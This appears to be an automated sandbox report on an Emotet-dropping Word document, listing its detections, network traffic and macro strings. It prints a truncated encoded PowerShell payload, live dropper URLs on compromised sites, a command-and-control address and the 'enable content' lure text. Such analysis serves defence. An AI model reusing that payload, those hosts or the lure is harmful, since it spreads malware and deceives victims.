aABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArA

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus detection for URL or domainShow sources
                      Source: http://veterinariadrpopui.com/content/5f18Q/Avira URL Cloud: Label: malware
                      Source: http://khanhhoahomnay.net/wordpress/CGMC/Avira URL Cloud: Label: malware
                      Source: http://shop.elemenslide.com/wp-content/n/Avira URL Cloud: Label: malware
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: pack-91089 416755919.docVirustotal: Detection: 36%Perma Link
                      Source: pack-91089 416755919.docReversingLabs: Detection: 43%
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt,7_2_100011C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100021F0 CryptStringToBinaryW,CoTaskMemAlloc,CryptStringToBinaryW,StgDeserializePropVariant,CoTaskMemFree,7_2_100021F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10002730 StgSerializePropVariant,CryptBinaryToStringW,CoTaskMemAlloc,CryptBinaryToStringW,CoTaskMemFree,CoTaskMemFree,7_2_10002730
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002275AE CryptDecodeObjectEx,14_2_002275AE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0022109C FindFirstFileW,14_2_0022109C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                      Source: global trafficDNS query: name: wpsapk.com
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.18.61.59:80
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.18.61.59:80

                      Networking:

                      barindex
                      Potential dropper URLs found in powershell memoryShow sources
                      Source: powershell.exe, 00000005.00000002.2111561067.00000000036D3000.00000004.00000001.sdmpString found in memory: http://wpsapk.com/wp-admin/v/
                      Source: powershell.exe, 00000005.00000002.2111561067.00000000036D3000.00000004.00000001.sdmpString found in memory: http://sofsuite.com/wp-includes/2jm3nIk/
                      Source: powershell.exe, 00000005.00000002.2111561067.00000000036D3000.00000004.00000001.sdmpString found in memory: http://veterinariadrpopui.com/content/5f18Q/
                      Source: powershell.exe, 00000005.00000002.2111561067.00000000036D3000.00000004.00000001.sdmpString found in memory: http://shop.elemenslide.com/wp-content/n/
                      Source: powershell.exe, 00000005.00000002.2111561067.00000000036D3000.00000004.00000001.sdmpString found in memory: http://khanhhoahomnay.net/wordpress/CGMC/
                      Source: powershell.exe, 00000005.00000002.2111561067.00000000036D3000.00000004.00000001.sdmpString found in memory: http://campusexpo.org/department-of-odhmmkd/95eXZY/
                      Source: powershell.exe, 00000005.00000002.2111561067.00000000036D3000.00000004.00000001.sdmpString found in memory: https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/
                      Source: global trafficHTTP traffic detected: GET /wp-admin/v/ HTTP/1.1Host: wpsapk.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wp-includes/2jm3nIk/ HTTP/1.1Host: sofsuite.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /content/5f18Q/ HTTP/1.1Host: veterinariadrpopui.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wordpress/CGMC/ HTTP/1.1Host: khanhhoahomnay.netConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 209.59.139.39 209.59.139.39
                      Source: Joe Sandbox ViewIP Address: 5.2.136.90 5.2.136.90
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox ViewASN Name: LIQUIDWEBUS LIQUIDWEBUS
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: global trafficHTTP traffic detected: POST /9ormjijma/sd2xibclmrp5oftlrxf/ HTTP/1.1DNT: 0Referer: 5.2.136.90/9ormjijma/sd2xibclmrp5oftlrxf/Content-Type: multipart/form-data; boundary=-------------qEVZIKHrPRVz2User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 5.2.136.90Content-Length: 8452Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0023023A InternetReadFile,14_2_0023023A
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{43B9F0D0-FFD8-4816-B513-C2DC6937B540}.tmpJump to behavior
                      Source: global trafficHTTP traffic detected: GET /wp-admin/v/ HTTP/1.1Host: wpsapk.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wp-includes/2jm3nIk/ HTTP/1.1Host: sofsuite.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /content/5f18Q/ HTTP/1.1Host: veterinariadrpopui.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wordpress/CGMC/ HTTP/1.1Host: khanhhoahomnay.netConnection: Keep-Alive
                      Source: rundll32.exe, 00000006.00000002.2113194713.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108067527.0000000002200000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                      Source: unknownDNS traffic detected: queries for: wpsapk.com
                      Source: unknownHTTP traffic detected: POST /9ormjijma/sd2xibclmrp5oftlrxf/ HTTP/1.1DNT: 0Referer: 5.2.136.90/9ormjijma/sd2xibclmrp5oftlrxf/Content-Type: multipart/form-data; boundary=-------------qEVZIKHrPRVz2User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 5.2.136.90Content-Length: 8452Connection: Keep-AliveCache-Control: no-cache
                      Source: powershell.exe, 00000005.00000002.2111561067.00000000036D3000.00000004.00000001.sdmpString found in binary or memory: http://campusexpo.org/department-of-odhmmkd/95eXZY/
                      Source: rundll32.exe, 00000006.00000002.2113194713.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108067527.0000000002200000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                      Source: rundll32.exe, 00000006.00000002.2113194713.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108067527.0000000002200000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                      Source: powershell.exe, 00000005.00000002.2113549064.0000000003AA9000.00000004.00000001.sdmpString found in binary or memory: http://khanhhoahomnay.net
                      Source: powershell.exe, 00000005.00000002.2111561067.00000000036D3000.00000004.00000001.sdmpString found in binary or memory: http://khanhhoahomnay.net/wordpress/CGMC/
                      Source: rundll32.exe, 00000006.00000002.2114950190.0000000001CF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108832801.00000000023E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109391718.0000000001FE7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                      Source: rundll32.exe, 00000006.00000002.2114950190.0000000001CF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108832801.00000000023E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109391718.0000000001FE7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                      Source: powershell.exe, 00000005.00000002.2105665763.0000000002420000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110083444.00000000028B0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2111681625.00000000027C0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: rundll32.exe, 00000006.00000002.2114950190.0000000001CF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108832801.00000000023E7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                      Source: powershell.exe, 00000005.00000002.2113549064.0000000003AA9000.00000004.00000001.sdmpString found in binary or memory: http://shop.elemenslide.com
                      Source: powershell.exe, 00000005.00000002.2111561067.00000000036D3000.00000004.00000001.sdmpString found in binary or memory: http://shop.elemenslide.com/wp-content/n/
                      Source: powershell.exe, 00000005.00000002.2113132741.0000000003A23000.00000004.00000001.sdmpString found in binary or memory: http://sofsuite.com
                      Source: powershell.exe, 00000005.00000002.2111561067.00000000036D3000.00000004.00000001.sdmpString found in binary or memory: http://sofsuite.com/wp-includes/2jm3nIk/
                      Source: powershell.exe, 00000005.00000002.2113375099.0000000003A6E000.00000004.00000001.sdmpString found in binary or memory: http://veterinariadrpopui.com
                      Source: powershell.exe, 00000005.00000002.2111561067.00000000036D3000.00000004.00000001.sdmpString found in binary or memory: http://veterinariadrpopui.com/content/5f18Q/
                      Source: rundll32.exe, 00000006.00000002.2114950190.0000000001CF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108832801.00000000023E7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                      Source: powershell.exe, 00000005.00000002.2111561067.00000000036D3000.00000004.00000001.sdmpString found in binary or memory: http://wpsapk.com
                      Source: powershell.exe, 00000005.00000002.2111561067.00000000036D3000.00000004.00000001.sdmpString found in binary or memory: http://wpsapk.com/wp-admin/v/
                      Source: powershell.exe, 00000005.00000002.2105665763.0000000002420000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110083444.00000000028B0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2111681625.00000000027C0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: rundll32.exe, 00000006.00000002.2113194713.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108067527.0000000002200000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                      Source: rundll32.exe, 00000006.00000002.2114950190.0000000001CF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108832801.00000000023E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109391718.0000000001FE7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                      Source: rundll32.exe, 00000006.00000002.2113194713.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108067527.0000000002200000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                      Source: powershell.exe, 00000005.00000002.2104348720.0000000000264000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
                      Source: powershell.exe, 00000005.00000002.2104363576.0000000000294000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
                      Source: rundll32.exe, 00000007.00000002.2108067527.0000000002200000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                      Source: powershell.exe, 00000005.00000002.2111561067.00000000036D3000.00000004.00000001.sdmpString found in binary or memory: https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/
                      Source: powershell.exe, 00000005.00000002.2113375099.0000000003A6E000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2113102392.0000000003A07000.00000004.00000001.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing

                      E-Banking Fraud:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2117427965.00000000006C1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2115320504.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2108163281.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2106729405.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2109384640.00000000001D1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2347931935.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2111315259.0000000000271000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2112888635.0000000000180000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2108276475.00000000001E1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2118908713.00000000001E1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2118847844.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2111186351.0000000000230000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2109344000.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2112953957.00000000001A1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 9.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.270000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.6c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE

                      System Summary:

                      barindex
                      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                      Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page: I of I Words:
                      Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
                      Source: Screenshot number: 4Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page: I of I Words: 3 N@m 13 ;a 10096 G)
                      Source: Screenshot number: 8Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. K O a S
                      Source: Screenshot number: 8Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                      Source: Screenshot number: 8Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Screenshot number: 8Screenshot OCR: ENABLE CONTENT" buttons to preview this document. K O a S
                      Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 1Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                      Source: Document image extraction number: 1Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                      Document contains an embedded VBA macro with suspicious stringsShow sources
                      Source: pack-91089 416755919.docOLE, VBA macro line: Set SblcDCC = pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC")
                      Source: pack-91089 416755919.docOLE, VBA macro line: Set fNhiCVgGS = RyDBDK.CreateTextFile("YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF")
                      Source: pack-91089 416755919.docOLE, VBA macro line: Set HCvCmAcHC = iFTmFHFH.CreateTextFile("shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf")
                      Source: pack-91089 416755919.docOLE, VBA macro line: Set gEcrV = RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA")
                      Source: pack-91089 416755919.docOLE, VBA macro line: Set ZMdrVHGz = xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ")
                      Source: pack-91089 416755919.docOLE, VBA macro line: Set fDZVKAAc = tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo")
                      Source: pack-91089 416755919.docOLE, VBA macro line: Set rYbgBh = hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ")
                      Source: pack-91089 416755919.docOLE, VBA macro line: Set GfRPP = xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD")
                      Source: pack-91089 416755919.docOLE, VBA macro line: Set sCOIGDtD = eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH")
                      Source: pack-91089 416755919.docOLE, VBA macro line: Set fmwdEMADQ = DkLoDL.CreateTextFile("pGMMG:\enlVVB\fMqiFP.kEIECDZHz")
                      Source: pack-91089 416755919.docOLE, VBA macro line: Set pkixJADG = DhnHIY.CreateTextFile("rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW")
                      Source: pack-91089 416755919.docOLE, VBA macro line: Set KmGOADt = CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA")
                      Source: pack-91089 416755919.docOLE, VBA macro line: Set PbhYVsA = PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB")
                      Source: pack-91089 416755919.docOLE, VBA macro line: Set NuebA = sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR")
                      Source: pack-91089 416755919.docOLE, VBA macro line: Set gxBPJB = zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD")
                      Source: pack-91089 416755919.docOLE, VBA macro line: Set mgrwfmN = RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC")
                      Source: pack-91089 416755919.docOLE, VBA macro line: Set uWZkeMFv = zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs")
                      Source: pack-91089 416755919.docOLE, VBA macro line: Set iHKuDmaEr = OMZxxg.CreateTextFile("QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD")
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set SblcDCC = pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC")Name: G8xesq0b8jlsfrsp
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set fNhiCVgGS = RyDBDK.CreateTextFile("YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF")Name: G8xesq0b8jlsfrsp
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set HCvCmAcHC = iFTmFHFH.CreateTextFile("shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf")Name: G8xesq0b8jlsfrsp
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set gEcrV = RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA")Name: G8xesq0b8jlsfrsp
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set ZMdrVHGz = xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ")Name: G8xesq0b8jlsfrsp
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set fDZVKAAc = tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo")Name: G8xesq0b8jlsfrsp
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set rYbgBh = hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ")Name: G8xesq0b8jlsfrsp
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set GfRPP = xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD")Name: G8xesq0b8jlsfrsp
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set sCOIGDtD = eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH")Name: G8xesq0b8jlsfrsp
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set fmwdEMADQ = DkLoDL.CreateTextFile("pGMMG:\enlVVB\fMqiFP.kEIECDZHz")Name: G8xesq0b8jlsfrsp
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set pkixJADG = DhnHIY.CreateTextFile("rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW")Name: G8xesq0b8jlsfrsp
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set KmGOADt = CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA")Name: G8xesq0b8jlsfrsp
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set PbhYVsA = PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB")Name: Jlda77h_v8nx5
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set NuebA = sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR")Name: Jlda77h_v8nx5
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set gxBPJB = zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD")Name: Jlda77h_v8nx5
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set mgrwfmN = RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC")Name: Jlda77h_v8nx5
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String createtextfile: Set uWZkeMFv = zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs")Name: Hrs2a1p95u19
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String createtextfile: Set iHKuDmaEr = OMZxxg.CreateTextFile("QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD")Name: Hrs2a1p95u19
                      Document contains an embedded VBA with base64 encoded stringsShow sources
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String uTtCAFwHpCGF
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String lwWhZGEasjsS
